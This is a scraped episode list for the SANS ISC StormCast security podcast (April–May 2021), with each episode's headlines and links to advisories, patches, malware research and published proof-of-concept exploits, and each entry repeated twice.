May 2021 Forensic Contest: Answers and Analysis https://isc.sans.edu/forums/diary/May+2021+Forensic+Contest+Answers+and+Analysis/27430/ CIS Controls V8 https://www.cisecurity.org/controls/v8/ Dell iDRAC 9 Security Update https://www.dell.com/support/kbdoc/en-us/000186420/dsa-2021-082-dell-emc-idrac-9-security-update-for-improper-authentication-vulnerability QNAP Pre-Auth Remote Code Execution in MuscStation/MalwareRemover https://www.shielder.it/advisories/qnap-musicstation-malwareremover-pre-auth-remote-code-execution/
5/20/20216 minutes, 7 seconds
Episode Artwork

ISC StormCast for Thursday, May 20th, 2021

May 2021 Forensic Contest: Answers and Analysis https://isc.sans.edu/forums/diary/May+2021+Forensic+Contest+Answers+and+Analysis/27430/ CIS Controls V8 https://www.cisecurity.org/controls/v8/ Dell iDRAC 9 Security Update https://www.dell.com/support/kbdoc/en-us/000186420/dsa-2021-082-dell-emc-idrac-9-security-update-for-improper-authentication-vulnerability QNAP Pre-Auth Remote Code Execution in MuscStation/MalwareRemover https://www.shielder.it/advisories/qnap-musicstation-malwareremover-pre-auth-remote-code-execution/
5/20/20216 minutes, 7 seconds
Episode Artwork

ISC StormCast for Wednesday, May 19th, 2021

From RunDLL32 to JavaScript then PowerShell https://isc.sans.edu/forums/diary/From+RunDLL32+to+JavaScript+then+PowerShell/27428/ New Pulse Secure VPN Advisory https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44800/ Android Stalkerware Vulnerabilities https://www.welivesecurity.com/2021/05/17/android-stalkerware-threatens-victims-further-exposes-snoopers-themselves/ Double Encrypting Ransomware https://www.wired.com/story/ransomware-double-encryption/
5/19/20215 minutes, 21 seconds
Episode Artwork

ISC StormCast for Wednesday, May 19th, 2021

From RunDLL32 to JavaScript then PowerShell https://isc.sans.edu/forums/diary/From+RunDLL32+to+JavaScript+then+PowerShell/27428/ New Pulse Secure VPN Advisory https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44800/ Android Stalkerware Vulnerabilities https://www.welivesecurity.com/2021/05/17/android-stalkerware-threatens-victims-further-exposes-snoopers-themselves/ Double Encrypting Ransomware https://www.wired.com/story/ransomware-double-encryption/
5/19/20215 minutes, 21 seconds
Episode Artwork

ISC StormCast for Tuesday, May 18th, 2021

Ransomware Defenses https://isc.sans.edu/forums/diary/Ransomware+Defenses/27420/ AXA Stops Ransomware Payments https://www.insurancejournal.com/news/international/2021/05/09/613255.htm http.sys Proof of Concept https://github.com/0vercl0k/CVE-2021-31166 Google/Mozilla colaborating on HTML Sanitizer API https://wicg.github.io/sanitizer-api/#sanitizer-api SANS Technology Institute Research Journal https://www.sans.edu/cyber-research
5/18/20216 minutes, 8 seconds
Episode Artwork

ISC StormCast for Tuesday, May 18th, 2021

Ransomware Defenses https://isc.sans.edu/forums/diary/Ransomware+Defenses/27420/ AXA Stops Ransomware Payments https://www.insurancejournal.com/news/international/2021/05/09/613255.htm http.sys Proof of Concept https://github.com/0vercl0k/CVE-2021-31166 Google/Mozilla colaborating on HTML Sanitizer API https://wicg.github.io/sanitizer-api/#sanitizer-api SANS Technology Institute Research Journal https://www.sans.edu/cyber-research
5/18/20216 minutes, 8 seconds
Episode Artwork

ISC StormCast for Monday, May 17th, 2021

"Open" Access to Industrial Systems Interfaces is Also Far From Zero https://isc.sans.edu/forums/diary/Open+Access+to+Industrial+Systems+Interface+is+Also+Far+From+Zero/27418/ Malicious Rust Macro for VSCode https://github.com/lucky/bad_actor_poc Exim PoC Released https://adepts.of0x.cc/exim-cve-2020-28018/ Newly Observed PHP-based skimmmer shows ongoing Magecart Group 12 activity https://blog.malwarebytes.com/cybercrime/2021/05/newly-observed-php-based-skimmer-shows-ongoing-magecart-group-12-activity/
5/17/20215 minutes, 41 seconds
Episode Artwork

ISC StormCast for Monday, May 17th, 2021

"Open" Access to Industrial Systems Interfaces is Also Far From Zero https://isc.sans.edu/forums/diary/Open+Access+to+Industrial+Systems+Interface+is+Also+Far+From+Zero/27418/ Malicious Rust Macro for VSCode https://github.com/lucky/bad_actor_poc Exim PoC Released https://adepts.of0x.cc/exim-cve-2020-28018/ Newly Observed PHP-based skimmmer shows ongoing Magecart Group 12 activity https://blog.malwarebytes.com/cybercrime/2021/05/newly-observed-php-based-skimmer-shows-ongoing-magecart-group-12-activity/
5/17/20215 minutes, 41 seconds
Episode Artwork

ISC StormCast for Friday, May 14th, 2021

Cross Browser Tracking with Schemeflood https://fingerprintjs.com/blog/external-protocol-flooding/ Cisco AnyConnect Secure Mobility Client Patch https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-anyconnect-ipc-KfQO9QhK MSBuild Abused By Attackers https://www.anomali.com/blog/threat-actors-use-msbuild-to-deliver-rats-filelessly
5/14/20216 minutes, 48 seconds
Episode Artwork

ISC StormCast for Friday, May 14th, 2021

Cross Browser Tracking with Schemeflood https://fingerprintjs.com/blog/external-protocol-flooding/ Cisco AnyConnect Secure Mobility Client Patch https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-anyconnect-ipc-KfQO9QhK MSBuild Abused By Attackers https://www.anomali.com/blog/threat-actors-use-msbuild-to-deliver-rats-filelessly
5/14/20216 minutes, 48 seconds
Episode Artwork

ISC StormCast for Thursday, May 13th, 2021

Number of industrial control systems on the internet is lower then in 2020...but still far from zero https://isc.sans.edu/forums/diary/Number+of+industrial+control+systems+on+the+internet+is+lower+then+in+2020but+still+far+from+zero/27412/ Webcast: Ransoming Critical Infrastructure https://www.sans.org/webcasts/119775 Links to FragAttacks Vendor Bulletins (in German) https://www.heise.de/news/WLAN-Sicherheitsluecken-FragAttacks-Erste-Updates-6045116.html Adobe Acrobat Patches https://helpx.adobe.com/security/products/acrobat/apsb21-29.html Sending Arbitrary Messages via FindMy https://positive.security/blog/send-my
5/13/20215 minutes, 51 seconds
Episode Artwork

ISC StormCast for Thursday, May 13th, 2021

Number of industrial control systems on the internet is lower then in 2020...but still far from zero https://isc.sans.edu/forums/diary/Number+of+industrial+control+systems+on+the+internet+is+lower+then+in+2020but+still+far+from+zero/27412/ Webcast: Ransoming Critical Infrastructure https://www.sans.org/webcasts/119775 Links to FragAttacks Vendor Bulletins (in German) https://www.heise.de/news/WLAN-Sicherheitsluecken-FragAttacks-Erste-Updates-6045116.html Adobe Acrobat Patches https://helpx.adobe.com/security/products/acrobat/apsb21-29.html Sending Arbitrary Messages via FindMy https://positive.security/blog/send-my
5/13/20215 minutes, 51 seconds
Episode Artwork

ISC StormCast for Wednesday, May 12th, 2021

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+May+2021+Patch+Tuesday/27408 WiFi Fragmentation Attacks https://www.fragattacks.com
5/12/20216 minutes, 30 seconds
Episode Artwork

ISC StormCast for Wednesday, May 12th, 2021

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+May+2021+Patch+Tuesday/27408 WiFi Fragmentation Attacks https://www.fragattacks.com
5/12/20216 minutes, 30 seconds
Episode Artwork

ISC StormCast for Tuesday, May 11th, 2021

Validating IP Addresses: Why Encoding Matters https://isc.sans.edu/forums/diary/Correctly+Validating+IP+Addresses+Why+encoding+matters+for+input+validation/27404/ Jail Breaking AirTags https://twitter.com/ghidraninja/status/1391148503196438529 Malicious Tor Exit Relay Activities https://nusenu.medium.com/tracking-one-year-of-malicious-tor-exit-relay-activities-part-ii-85c80875c5df
5/11/20215 minutes, 27 seconds
Episode Artwork

ISC StormCast for Tuesday, May 11th, 2021

Validating IP Addresses: Why Encoding Matters https://isc.sans.edu/forums/diary/Correctly+Validating+IP+Addresses+Why+encoding+matters+for+input+validation/27404/ Jail Breaking AirTags https://twitter.com/ghidraninja/status/1391148503196438529 Malicious Tor Exit Relay Activities https://nusenu.medium.com/tracking-one-year-of-malicious-tor-exit-relay-activities-part-ii-85c80875c5df
5/11/20215 minutes, 27 seconds
Episode Artwork

ISC StormCast for Monday, May 10th, 2021

Who is Probing the Internet for Research Purposes https://isc.sans.edu/forums/diary/Who+is+Probing+the+Internet+for+Research+Purposes/27400/ Cycle Hunter and tsuNAME DDoS Attack https://github.com/SIDN/CycleHunter https://tsuname.io/tech_report.pdf Foxit Reader / Phantom PDF Vulnerabilities https://www.foxitsoftware.com/support/security-bulletins.html?Security+updates+available+in+Foxit+Reader+10.1.4+and+Foxit+PhantomPDF+10.1.42021-05-06 Hypocrit Patches Reviewed By Linux Foundation https://lore.kernel.org/lkml/202104221451.292A6ED4@keescook/
5/10/20215 minutes, 22 seconds
Episode Artwork

ISC StormCast for Monday, May 10th, 2021

Who is Probing the Internet for Research Purposes https://isc.sans.edu/forums/diary/Who+is+Probing+the+Internet+for+Research+Purposes/27400/ Cycle Hunter and tsuNAME DDoS Attack https://github.com/SIDN/CycleHunter https://tsuname.io/tech_report.pdf Foxit Reader / Phantom PDF Vulnerabilities https://www.foxitsoftware.com/support/security-bulletins.html?Security+updates+available+in+Foxit+Reader+10.1.4+and+Foxit+PhantomPDF+10.1.42021-05-06 Hypocrit Patches Reviewed By Linux Foundation https://lore.kernel.org/lkml/202104221451.292A6ED4@keescook/
5/10/20215 minutes, 22 seconds
Episode Artwork

ISC StormCast for Friday, May 7th, 2021

Scans for Exposed Azure Storage Containers https://isc.sans.edu/forums/diary/Exposed+Azure+Storage+Containers/27396/ Qualcomm MSM Vulnerability https://research.checkpoint.com/2021/security-probe-of-qualcomm-msm/ Google to Automatically enroll users in 2SF https://blog.google/technology/safety-security/a-simpler-and-safer-future-without-passwords/ New Cellebrite Vulnerabilities Announced https://www.ehackingnews.com/2021/05/new-vulnerabilities-in-cellebrites.html
5/7/20215 minutes, 36 seconds
Episode Artwork

ISC StormCast for Friday, May 7th, 2021

Scans for Exposed Azure Storage Containers https://isc.sans.edu/forums/diary/Exposed+Azure+Storage+Containers/27396/ Qualcomm MSM Vulnerability https://research.checkpoint.com/2021/security-probe-of-qualcomm-msm/ Google to Automatically enroll users in 2SF https://blog.google/technology/safety-security/a-simpler-and-safer-future-without-passwords/ New Cellebrite Vulnerabilities Announced https://www.ehackingnews.com/2021/05/new-vulnerabilities-in-cellebrites.html
5/7/20215 minutes, 36 seconds
Episode Artwork

ISC StormCast for Thursday, May 6th, 2021

May 2021 Forensic Contest https://isc.sans.edu/forums/diary/May+2021+Forensic+Contest/27386/ Windows Defender Bug Fills Windows 10 Boot Drive with thousands of files https://www.bleepingcomputer.com/news/microsoft/windows-defender-bug-fills-windows-10-boot-drive-with-thousands-of-files/ VMWare vRealize Business for Cloud Patch https://kb.vmware.com/s/article/83475 Cisco Updates SD-WAN vManager / HyperFlex HX https://tools.cisco.com/security/center/publicationListing.x?product=Cisco&sort=-day_sir&limit=100#~Vulnerabilities Security and Privacy Risks of Number Recycling at Mobile Carriers in the US https://recyclednumbers.cs.princeton.edu
5/6/20216 minutes, 17 seconds
Episode Artwork

ISC StormCast for Thursday, May 6th, 2021

May 2021 Forensic Contest https://isc.sans.edu/forums/diary/May+2021+Forensic+Contest/27386/ Windows Defender Bug Fills Windows 10 Boot Drive with thousands of files https://www.bleepingcomputer.com/news/microsoft/windows-defender-bug-fills-windows-10-boot-drive-with-thousands-of-files/ VMWare vRealize Business for Cloud Patch https://kb.vmware.com/s/article/83475 Cisco Updates SD-WAN vManager / HyperFlex HX https://tools.cisco.com/security/center/publicationListing.x?product=Cisco&sort=-day_sir&limit=100#~Vulnerabilities Security and Privacy Risks of Number Recycling at Mobile Carriers in the US https://recyclednumbers.cs.princeton.edu
5/6/20216 minutes, 17 seconds
Episode Artwork

ISC StormCast for Wednesday, May 5th, 2021

Android Update https://source.android.com/security/bulletin/2021-05-01?hl=en Dell Privilege Escalation Vulnerability https://www.dell.com/support/kbdoc/en-us/000186019/dsa-2021-088-dell-client-platform-security-update-for-dell-driver-insufficient-access-control-vulnerability https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/ Exim Mail Server Vulnerabilities https://www.qualys.com/2021/05/04/21nails/21nails.txt Quick and Dirty Python: masscan https://isc.sans.edu/forums/diary/Quick+and+dirty+Python+masscan/27384/ ICMP Tunnel Backdoor https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel/
5/5/20215 minutes, 31 seconds
Episode Artwork

ISC StormCast for Wednesday, May 5th, 2021

Android Update https://source.android.com/security/bulletin/2021-05-01?hl=en Dell Privilege Escalation Vulnerability https://www.dell.com/support/kbdoc/en-us/000186019/dsa-2021-088-dell-client-platform-security-update-for-dell-driver-insufficient-access-control-vulnerability https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/ Exim Mail Server Vulnerabilities https://www.qualys.com/2021/05/04/21nails/21nails.txt Quick and Dirty Python: masscan https://isc.sans.edu/forums/diary/Quick+and+dirty+Python+masscan/27384/ ICMP Tunnel Backdoor https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel/
5/5/20215 minutes, 31 seconds
Episode Artwork

ISC StormCast for Tuesday, May 4th, 2021

Apple Patches 2 0-Day Flaws in WebKit affecting iOS/MacOS/WatchOS https://support.apple.com/en-us/HT201222 PoC Exploit for CVE-2021-28482 (Microsoft Exchange) https://gist.github.com/testanull/9ebbd6830f7a501e35e67f2fcaa57bda https://testbnull.medium.com/microsoft-exchange-from-deserialization-to-post-auth-rce-cve-2021-28482-e713001d915f Yet Another Processor Side-Channel: Micro-Ops Caches http://www.cs.virginia.edu/venkat/papers/isca2021a.pdf Pulse Secure Update https://blog.pulsesecure.net/pulse-connect-secure-patch-availability-sa44784/
5/4/20214 minutes, 42 seconds
Episode Artwork

ISC StormCast for Tuesday, May 4th, 2021

Apple Patches 2 0-Day Flaws in WebKit affecting iOS/MacOS/WatchOS https://support.apple.com/en-us/HT201222 PoC Exploit for CVE-2021-28482 (Microsoft Exchange) https://gist.github.com/testanull/9ebbd6830f7a501e35e67f2fcaa57bda https://testbnull.medium.com/microsoft-exchange-from-deserialization-to-post-auth-rce-cve-2021-28482-e713001d915f Yet Another Processor Side-Channel: Micro-Ops Caches http://www.cs.virginia.edu/venkat/papers/isca2021a.pdf Pulse Secure Update https://blog.pulsesecure.net/pulse-connect-secure-patch-availability-sa44784/
5/4/20214 minutes, 42 seconds
Episode Artwork

ISC StormCast for Monday, May 3rd, 2021

Qiling: A true instrumentable binary emulation framework https://isc.sans.edu/forums/diary/Qiling+A+true+instrumentable+binary+emulation+framework/27372/ Python "ipaddress" improper input validation https://sick.codes/sick-2021-014/ EXIF Tool Vulnerabilities https://twitter.com/wcbowling/status/1385803927321415687 ABUS Secvest Internet Connected Alarm Systems https://eye.security/nl/blog/breaking-abus-secvest-internet-connected-alarm-systems-cve-2020-28973 FiveHands Ransomware Installed via SonicWall Flaw https://thehackernews.com/2021/04/hackers-exploit-sonicwall-zero-day-bug.html
5/3/20215 minutes, 31 seconds
Episode Artwork

ISC StormCast for Monday, May 3rd, 2021

Qiling: A true instrumentable binary emulation framework https://isc.sans.edu/forums/diary/Qiling+A+true+instrumentable+binary+emulation+framework/27372/ Python "ipaddress" improper input validation https://sick.codes/sick-2021-014/ EXIF Tool Vulnerabilities https://twitter.com/wcbowling/status/1385803927321415687 ABUS Secvest Internet Connected Alarm Systems https://eye.security/nl/blog/breaking-abus-secvest-internet-connected-alarm-systems-cve-2020-28973 FiveHands Ransomware Installed via SonicWall Flaw https://thehackernews.com/2021/04/hackers-exploit-sonicwall-zero-day-bug.html
5/3/20215 minutes, 31 seconds
Episode Artwork

ISC StormCast for Friday, April 30th, 2021

From Python to .Net https://isc.sans.edu/forums/diary/From+Python+to+Net/27366/ PHP Composer Vulnerability https://blog.sonarsource.com/php-supply-chain-attack-on-composer Microsoft Identifies Several Integer Overflow Vulnerablities https://us-cert.cisa.gov/ics/advisories/icsa-21-119-04
4/30/20215 minutes, 19 seconds
Episode Artwork

ISC StormCast for Friday, April 30th, 2021

From Python to .Net https://isc.sans.edu/forums/diary/From+Python+to+Net/27366/ PHP Composer Vulnerability https://blog.sonarsource.com/php-supply-chain-attack-on-composer Microsoft Identifies Several Integer Overflow Vulnerablities https://us-cert.cisa.gov/ics/advisories/icsa-21-119-04
4/30/20215 minutes, 19 seconds
Episode Artwork

ISC StormCast for Thursday, April 29th, 2021

Stopping Google FLoC https://github.blog/changelog/2021-04-27-github-pages-permissions-policy-interest-cohort-header-added-to-all-pages-sites/ https://amifloced.org RotaJakiro Backdoor https://blog.netlab.360.com/stealth_rotajakiro_backdoor_en/ F5 Big IP Kerberos Spoofing Vulnerablity https://support.f5.com/csp/article/K51213246
4/29/20215 minutes, 14 seconds
Episode Artwork

ISC StormCast for Thursday, April 29th, 2021

Stopping Google FLoC https://github.blog/changelog/2021-04-27-github-pages-permissions-policy-interest-cohort-header-added-to-all-pages-sites/ https://amifloced.org RotaJakiro Backdoor https://blog.netlab.360.com/stealth_rotajakiro_backdoor_en/ F5 Big IP Kerberos Spoofing Vulnerablity https://support.f5.com/csp/article/K51213246
4/29/20215 minutes, 14 seconds
Episode Artwork

ISC StormCast for Wednesday, April 28th, 2021

Diving into a Singapore Post Phihsing E-Mail https://isc.sans.edu/forums/diary/Diving+into+a+Singapore+Post+Phishing+Email/27356/ Two in Five Victims of Online Scam Adverts Do Not Report to Host Platforms https://www.which.co.uk/news/2021/04/two-in-five-victims-of-online-scam-adverts-dont-report-to-host-platforms/ Microsoft Defender Blocks Cryptojacking Malware https://www.microsoft.com/security/blog/2021/04/26/defending-against-cryptojacking-with-microsoft-defender-for-endpoint-and-intel-tdt/ Linux Privilege Escalation Vulnerability https://talosintelligence.com/vulnerability_reports/TALOS-2020-1211
4/28/20214 minutes, 25 seconds
Episode Artwork

ISC StormCast for Wednesday, April 28th, 2021

Diving into a Singapore Post Phihsing E-Mail https://isc.sans.edu/forums/diary/Diving+into+a+Singapore+Post+Phishing+Email/27356/ Two in Five Victims of Online Scam Adverts Do Not Report to Host Platforms https://www.which.co.uk/news/2021/04/two-in-five-victims-of-online-scam-adverts-dont-report-to-host-platforms/ Microsoft Defender Blocks Cryptojacking Malware https://www.microsoft.com/security/blog/2021/04/26/defending-against-cryptojacking-with-microsoft-defender-for-endpoint-and-intel-tdt/ Linux Privilege Escalation Vulnerability https://talosintelligence.com/vulnerability_reports/TALOS-2020-1211
4/28/20214 minutes, 25 seconds
Episode Artwork

ISC StormCast for Tuesday, April 27th, 2021

CAD: .DGN and .MVBA Files analyzed with oledump https://isc.sans.edu/forums/diary/CAD+DGN+and+MVBA+Files/27354/ MacOS 0-Day Bug Patched https://objective-see.com/blog/blog_0x64.html https://support.apple.com/en-us/HT201222 Emotet Uninstaller Triggered https://blog.malwarebytes.com/threat-analysis/2021/01/cleaning-up-after-emotet-the-law-enforcement-file/ HashiCorp Code Signing Key Exposed By Codecov Compromise https://www.theregister.com/2021/04/26/hashicorp_reveals_exposure_of_private/
4/27/20217 minutes, 23 seconds
Episode Artwork

ISC StormCast for Tuesday, April 27th, 2021

CAD: .DGN and .MVBA Files analyzed with oledump https://isc.sans.edu/forums/diary/CAD+DGN+and+MVBA+Files/27354/ MacOS 0-Day Bug Patched https://objective-see.com/blog/blog_0x64.html https://support.apple.com/en-us/HT201222 Emotet Uninstaller Triggered https://blog.malwarebytes.com/threat-analysis/2021/01/cleaning-up-after-emotet-the-law-enforcement-file/ HashiCorp Code Signing Key Exposed By Codecov Compromise https://www.theregister.com/2021/04/26/hashicorp_reveals_exposure_of_private/
4/27/20217 minutes, 23 seconds
Episode Artwork

ISC StormCast for Monday, April 26th, 2021

Compact VBA Macros https://isc.sans.edu/forums/diary/Malicious+PowerPoint+AddOn+Small+Is+Beautiful/27342/ Base64 Strings Used in Web Scanning https://isc.sans.edu/forums/diary/Base64+Hashes+Used+in+Web+Scanning/27346/ Clickstudios Password Manager Compromise https://www.csis.dk/newsroom-blog-overview/2021/moserpass-supply-chain/ Homebrew Code Execution Vulnerability https://brew.sh/2021/04/21/security-incident-disclosure/ Apple AirDrop Shares Personal Data https://www.informatik.tu-darmstadt.de/fb20/ueber_uns_details_231616.en.jsp
4/26/20215 minutes, 46 seconds
Episode Artwork

ISC StormCast for Monday, April 26th, 2021

Compact VBA Macros https://isc.sans.edu/forums/diary/Malicious+PowerPoint+AddOn+Small+Is+Beautiful/27342/ Base64 Strings Used in Web Scanning https://isc.sans.edu/forums/diary/Base64+Hashes+Used+in+Web+Scanning/27346/ Clickstudios Password Manager Compromise https://www.csis.dk/newsroom-blog-overview/2021/moserpass-supply-chain/ Homebrew Code Execution Vulnerability https://brew.sh/2021/04/21/security-incident-disclosure/ Apple AirDrop Shares Personal Data https://www.informatik.tu-darmstadt.de/fb20/ueber_uns_details_231616.en.jsp
4/26/20215 minutes, 46 seconds
Episode Artwork

ISC StormCast for Friday, April 23rd, 2021

How Safe are Your Docker Images https://isc.sans.edu/forums/diary/How+Safe+Are+Your+Docker+Images/27340/ Additional SolarWinds Infrastructure https://www.riskiq.com/blog/external-threat-management/solarwinds-c2-servers-new-tactics/ Cellebrite Exploit https://signal.org/blog/cellebrite-vulnerabilities/ Duo 2FA Bypass https://sensepost.com/blog/2021/duo-two-factor-authentication-bypass/
4/23/20215 minutes, 51 seconds
Episode Artwork

ISC StormCast for Friday, April 23rd, 2021

How Safe are Your Docker Images https://isc.sans.edu/forums/diary/How+Safe+Are+Your+Docker+Images/27340/ Additional SolarWinds Infrastructure https://www.riskiq.com/blog/external-threat-management/solarwinds-c2-servers-new-tactics/ Cellebrite Exploit https://signal.org/blog/cellebrite-vulnerabilities/ Duo 2FA Bypass https://sensepost.com/blog/2021/duo-two-factor-authentication-bypass/
4/23/20215 minutes, 51 seconds
Episode Artwork

ISC StormCast for Thursday, April 22nd, 2021

Linux Kernel Maintainer Calls Out "hypocrite commits" by University of Minnesota https://lore.kernel.org/lkml/[email protected]/ https://github.com/QiushiWu/QiushiWu.github.io/blob/main/papers/OpenSourceInsecurity.pdf https://www-users.cs.umn.edu/~kjlu/papers/clarifications-hc.pdf QNAP QLocker uses 7-Zip https://www.bleepingcomputer.com/news/security/massive-qlocker-ransomware-attack-uses-7zip-to-encrypt-qnap-devices/ Chrome O-Day Fixed https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html
4/22/20216 minutes, 25 seconds
Episode Artwork

ISC StormCast for Thursday, April 22nd, 2021

Linux Kernel Maintainer Calls Out "hypocrite commits" by University of Minnesota https://lore.kernel.org/lkml/[email protected]/ https://github.com/QiushiWu/QiushiWu.github.io/blob/main/papers/OpenSourceInsecurity.pdf https://www-users.cs.umn.edu/~kjlu/papers/clarifications-hc.pdf QNAP QLocker uses 7-Zip https://www.bleepingcomputer.com/news/security/massive-qlocker-ransomware-attack-uses-7zip-to-encrypt-qnap-devices/ Chrome O-Day Fixed https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html
4/22/20216 minutes, 25 seconds
Episode Artwork

ISC StormCast for Wednesday, April 21st, 2021

Pulse Secure VPN 0-Day Exploited https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/ SonicWall Vulnerabilities https://www.sonicwall.com/support/product-notification/security-notice-sonicwall-email-security-zero-day-vulnerabilities/210416112932360/ Synology Vulnerability https://blog.talosintelligence.com/2021/04/vuln-spotlight-synology-dsm.html#more Air Fryer Vulnerability https://blog.talosintelligence.com/2021/04/vuln-spotlight-co.html
4/21/20216 minutes, 15 seconds
Episode Artwork

ISC StormCast for Wednesday, April 21st, 2021

Pulse Secure VPN 0-Day Exploited https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/ SonicWall Vulnerabilities https://www.sonicwall.com/support/product-notification/security-notice-sonicwall-email-security-zero-day-vulnerabilities/210416112932360/ Synology Vulnerability https://blog.talosintelligence.com/2021/04/vuln-spotlight-synology-dsm.html#more Air Fryer Vulnerability https://blog.talosintelligence.com/2021/04/vuln-spotlight-co.html
4/21/20216 minutes, 15 seconds
Episode Artwork

ISC StormCast for Tuesday, April 20th, 2021

Hunting Phishing Websites with Favicon Hashes https://isc.sans.edu/forums/diary/Hunting+phishing+websites+with+favicon+hashes/27326/ Nagios XI Vulnerability Exploited by Cryptominers https://unit42.paloaltonetworks.com/nagios-xi-vulnerability-cryptomining/ XCSSET Malware Adapting to MacOS 11 and M1 https://www.trendmicro.com/en_us/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html QNAP Patches https://www.qnap.com/de-de/security-advisories?ref=security_advisory_details Juniper Updates https://kb.juniper.net/InfoCenter/index?page=content&channel=SECURITY_ADVISORIES
4/20/20215 minutes, 3 seconds
Episode Artwork

ISC StormCast for Tuesday, April 20th, 2021

Hunting Phishing Websites with Favicon Hashes https://isc.sans.edu/forums/diary/Hunting+phishing+websites+with+favicon+hashes/27326/ Nagios XI Vulnerability Exploited by Cryptominers https://unit42.paloaltonetworks.com/nagios-xi-vulnerability-cryptomining/ XCSSET Malware Adapting to MacOS 11 and M1 https://www.trendmicro.com/en_us/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html QNAP Patches https://www.qnap.com/de-de/security-advisories?ref=security_advisory_details Juniper Updates https://kb.juniper.net/InfoCenter/index?page=content&channel=SECURITY_ADVISORIES
4/20/20215 minutes, 3 seconds
Episode Artwork

ISC StormCast for Monday, April 19th, 2021

Decoding Cobalt Strike Traffic https://isc.sans.edu/forums/diary/Decoding+Cobalt+Strike+Traffic/27322/ Codecov Breach https://about.codecov.io/security-update/ Google Project Zero Tweaks Disclosure Rules https://googleprojectzero.blogspot.com EIPStackGroup OpENer Ethernet/IP https://us-cert.cisa.gov/ics/advisories/icsa-21-105-02 DNS Problems with Windows 10 Security Update https://www.bleepingcomputer.com/news/microsoft/mandatory-windows-10-update-causing-dns-and-shared-folder-issues/
4/19/20215 minutes, 36 seconds
Episode Artwork

ISC StormCast for Monday, April 19th, 2021

Decoding Cobalt Strike Traffic https://isc.sans.edu/forums/diary/Decoding+Cobalt+Strike+Traffic/27322/ Codecov Breach https://about.codecov.io/security-update/ Google Project Zero Tweaks Disclosure Rules https://googleprojectzero.blogspot.com EIPStackGroup OpENer Ethernet/IP https://us-cert.cisa.gov/ics/advisories/icsa-21-105-02 DNS Problems with Windows 10 Security Update https://www.bleepingcomputer.com/news/microsoft/mandatory-windows-10-update-causing-dns-and-shared-folder-issues/
4/19/20215 minutes, 36 seconds
Episode Artwork

ISC StormCast for Friday, April 16th, 2021

Why and How You Should be Using an Internal Certificate Authority https://isc.sans.edu/forums/diary/Why+and+How+You+Should+be+Using+an+Internal+Certificate+Authority/27314/ Vulnerabilities Used By Russian Foreign Intelligence Service https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/ Insecurity URL Handling https://positive.security/blog/url-open-rce SANS Research Paper: Bryan Scarbrough; Malware Detection in Encrypted TLS Traffic Through Machine Learning https://www.sans.org/reading-room/whitepapers/artificialintelligence/malware-detection-encrypted-tls-traffic-machine-learning-40185
4/16/202114 minutes, 20 seconds
Episode Artwork

ISC StormCast for Friday, April 16th, 2021

Why and How You Should be Using an Internal Certificate Authority https://isc.sans.edu/forums/diary/Why+and+How+You+Should+be+Using+an+Internal+Certificate+Authority/27314/ Vulnerabilities Used By Russian Foreign Intelligence Service https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/ Insecurity URL Handling https://positive.security/blog/url-open-rce SANS Research Paper: Bryan Scarbrough; Malware Detection in Encrypted TLS Traffic Through Machine Learning https://www.sans.org/reading-room/whitepapers/artificialintelligence/malware-detection-encrypted-tls-traffic-machine-learning-40185
4/16/202114 minutes, 20 seconds
Episode Artwork

ISC StormCast for Thursday, April 15th, 2021

April 2021 Forensics Quiz Solution https://isc.sans.edu/forums/diary/April+2021+Forensic+Quiz+Answers+and+Analysis/27308/ Adobe Patch Tuesday https://helpx.adobe.com/security.html Chrome 90 Released (and 0-Day Exploits) https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop_14.html https://github.com/avboy1337/1195777-chrome0day https://github.com/r4j0x00/exploits/tree/master/chrome-0day SAP Updates https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=573801649 Linux/Mac Malware included in npm Module https://blog.sonatype.com/damaging-linux-mac-malware-bundled-within-browserify-npm-brandjack-attempt Congratulations to the SANS.edu National Cyber League Teams! https://twitter.com/SANS_EDU/status/1382453652602941440
4/15/20216 minutes, 9 seconds
Episode Artwork

ISC StormCast for Thursday, April 15th, 2021

April 2021 Forensics Quiz Solution https://isc.sans.edu/forums/diary/April+2021+Forensic+Quiz+Answers+and+Analysis/27308/ Adobe Patch Tuesday https://helpx.adobe.com/security.html Chrome 90 Released (and 0-Day Exploits) https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop_14.html https://github.com/avboy1337/1195777-chrome0day https://github.com/r4j0x00/exploits/tree/master/chrome-0day SAP Updates https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=573801649 Linux/Mac Malware included in npm Module https://blog.sonatype.com/damaging-linux-mac-malware-bundled-within-browserify-npm-brandjack-attempt Congratulations to the SANS.edu National Cyber League Teams! https://twitter.com/SANS_EDU/status/1382453652602941440
4/15/20216 minutes, 9 seconds
Episode Artwork

ISC StormCast for Wednesday, April 14th, 2021

